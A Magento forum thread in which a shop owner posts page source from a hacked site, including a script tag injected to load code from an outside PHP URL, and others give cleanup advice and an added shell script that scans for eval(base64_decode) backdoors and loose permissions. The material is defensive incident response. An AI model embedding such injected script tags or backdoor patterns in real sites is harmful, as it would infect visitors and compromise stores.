Magento Forum

URGENT - SITE HACKED, Google Warning, PLEASE HELP!!! 
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

My site got hacked again, but this time Google warns customers that my site may be giving out malware.

I found where these Russian hackers inserted the text in a sitemap.html file

but I think that was just to fool me…

here is the code: I don’t know what file they altered.

the website is:

http://ezgmp.com/events/ezGXP-FDA-News.php

<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/reset.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/boxes.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/menu.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/clears.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/print.css" media="print" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/iestyles.css" media="all" />
<![endif]-->
<!--[if lt IE 7]>
<script type="text/javascript" src="http://www.domain.com/js/index.php?c=auto&amp;f=,lib/ds-sleight.js,varien/iehover-fix.js" ></script>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/ie7minus.css" media="all" />
<![endif]-->
<script type="text/javascript">var Translator = new Translate([]);</script></head><script src=http://ezgmp.com/events/ezGXP-FDA-News.php ></script>

<body class=" cms-page-view cms-home">
    <div class="no-display">

I think these hackers know my FTP password, because I changed the file permissions to 444, but when I checked this morning they had set the files to “write” again.

> I use FileZilla to upload files.
> I’ve scanned my computer of viruses and malwarebytes - NOTHING
> changed my passwords

I have a question:

What should my file permissions for files and folders be? 444 or 555? Or different files/folders different things?

Because I made the skin folder 444 and then my site stopped working altogether.

The admin section doesn’t work either. I can’t access any of the sub menu items.

 
 
Vincèn
Sr. Member
 
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 

Well, if they know your FTP password, the first thing is to change it to a very good one, as it’s the first step in security. Now you need to reinstall a clean Magento in a new separate hosting account and transfer your data into it, as once your store has been compromised you can never be sure you cleaned it completely!
Had you used some efficient login/pass for your admin backoffice, FTP and MySQL accounts?

Vincèn

 
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

All my passwords were complicated, using upper case, numbers and characters.

I’ve been through (what seems) every single index.php file, or any text file in my directory.

I got stuff out where I thought it wouldn’t even exist, but it was there.

I can’t find where they hid this script, it’s VERY FRUSTRATING!

Where could it be… between the <head> and <body> tags????

PLEASE HELP!

 
 
Vincèn
Sr. Member
 
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 
express33 - 15 November 2009 09:31 PM

All my passwords were complicated, using upper case, numbers and characters.
I’ve been through (what seems) every single index.php file, or any text file in my directory.
I got stuff out where I thought it wouldn’t even exist, but it was there.
I can’t find where they hid this script, it’s VERY FRUSTRATING!

As I told you previously, the only way to recover from such things is to reinstall Magento from scratch and rebuild it, as you can never be sure to have removed everything they made :( Were you up-to-date with your Magento version?

Vincèn

 
 
jonas73
Sr. Member
 
Total Posts:  97
Joined:  2009-04-24
 

My site was hacked the same way.

Make sure to search your entire account for the phrase base64_decode

Remove all strange code containing that phrase (code that starts with: <?php eval(base64_decode.............)

You will find they created some files as well. Look in image folders for a file called gifimg.php and remove them.

Never use FTP, use only SFTP. When you use FTP your password is open to the public in plain text.

Good luck.

 
 
J_T_
Moderator
 
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Also, never store the password in the FTP client. Always type it in every time you need it. It only takes an exploited ftp client to have your server compromised if the password is stored.

 
 
johnlouis
Sr. Member
 
Total Posts:  92
Joined:  2008-08-27
 

Thanks a lot jonas. It saved me a lot. My Magento site also was hacked. I found base64_decode in downloader/index.php, includes/config.php & media/cron.php. Once more, thank you very much.

 
 
Turnkeye
Enthusiast
 
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

It was a trojan program I suppose, install fresh antivirus software on all machines.

Also make sure that you use secure hosting, and it is not possible to view the folder outside your account via exec cd .. commands or view other clients or accounts using cat /etc/passwd

 
 
Turnkeye
Enthusiast
 
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

Here is how to report to google that your site is clean:

http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html

 
 
johnlouis
Sr. Member
 
Total Posts:  92
Joined:  2008-08-27
 

Thanks a lot @Turnkeye, I am onto it.

 
 
WebhostUK LTD
Sr. Member
 
Total Posts:  163
Joined:  2009-08-27
UK
 
express33 - 15 November 2009 09:31 PM

All my passwords were complicated, using upper case, numbers and characters.

I’ve been through (what seems) every single index.php file, or any text file in my directory.

I got stuff out where I thought it wouldn’t even exist, but it was there.

I can’t find where they hid this script, it’s VERY FRUSTRATING!

Where could it be… between the <head> and <body> tags????

PLEASE HELP!

Install suPHP on your server; this will make sure folder permissions are 755 and file permissions are 644. Files or folders with 777 permissions are always an easy way in for a hacker.
suPHP will also take care and not allow nobody files; it’s much safer to do so to prevent such activities.
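
The checks suggested in the posts above (jonas73's search for base64_decode and dropped files such as gifimg.php, and the 755/644 permission advice), as an added shell example that is not part of the original thread. The asset directory names (media, skin, images) and the sample tree are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: triage a web root for the indicators named in this thread.

# PHP files that pass base64-decoded data to eval() (whitespace and case tolerant).
find_eval_b64() {
  grep -rlEi --include='*.php' 'eval[[:space:]]*\([[:space:]]*base64_decode' "$1" | sort
}

# PHP files inside directories assumed to hold only static assets
# (images, CSS); a file like gifimg.php in an image folder lands here.
find_php_in_assets() {
  find "$1" -type f -name '*.php' \
    \( -path '*/media/*' -o -path '*/skin/*' -o -path '*/images/*' \) | sort
}

# Files or directories writable by group or others, i.e. looser than 644 / 755.
find_loose_perms() {
  find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) | sort
}

# Build a small constructed tree to try the checks on (not real site data).
make_sample_tree() {
  local d
  d=$(mktemp -d)
  mkdir -p "$d/downloader" "$d/media/catalog" "$d/app"
  printf '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n' > "$d/downloader/index.php"
  printf '<?php eval ( base64_decode("ZWNobyAxOw=="));\n' > "$d/media/catalog/gifimg.php"
  # Legitimate use of base64_decode without eval: must not be reported.
  printf '<?php echo base64_decode($label);\n' > "$d/app/clean.php"
  chmod 755 "$d" "$d/downloader" "$d/media" "$d/media/catalog" "$d/app"
  chmod 644 "$d/downloader/index.php" "$d/app/clean.php"
  chmod 666 "$d/media/catalog/gifimg.php"
  echo "$d"
}

# Print a report for one web root, e.g.: scan_webroot /path/to/site
scan_webroot() {
  echo "== eval(base64_decode ...) in PHP files"; find_eval_b64 "$1"
  echo "== PHP files in asset directories";       find_php_in_assets "$1"
  echo "== group/world-writable paths";           find_loose_perms "$1"
}
```

Each hit is a lead for manual review against a clean copy of the same Magento version, not proof of compromise on its own.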

 
 
Turnkeye
Enthusiast
 
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 
Turnkeye.com - 27 February 2010 11:13 AM

Here is how to report to google that your site is clean:

http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html

Feel free to contact us if you need any help.

 
 
Nautica
Sr. Member
 
Total Posts:  140
Joined:  2008-01-03
 
johnlouis - 10 February 2010 01:16 AM

Thanks a lot jonas. It saved me a lot. My Magento site also was hacked. I found base64_decode in downloader/index.php, includes/config.php & media/cron.php. Once more, thank you very much.

Should there be a cron.php in the Media folder??? I don’t have it in my install.

And never use FileZilla. I also experienced stolen passwords before with FileZilla. You must have had a trojan that stole passwords from FileZilla (running illegal software with a crack, grin).

I still experience login attempts with the old passwords and login names in the logs (of course they are all changed). Most attempts originate in China.

 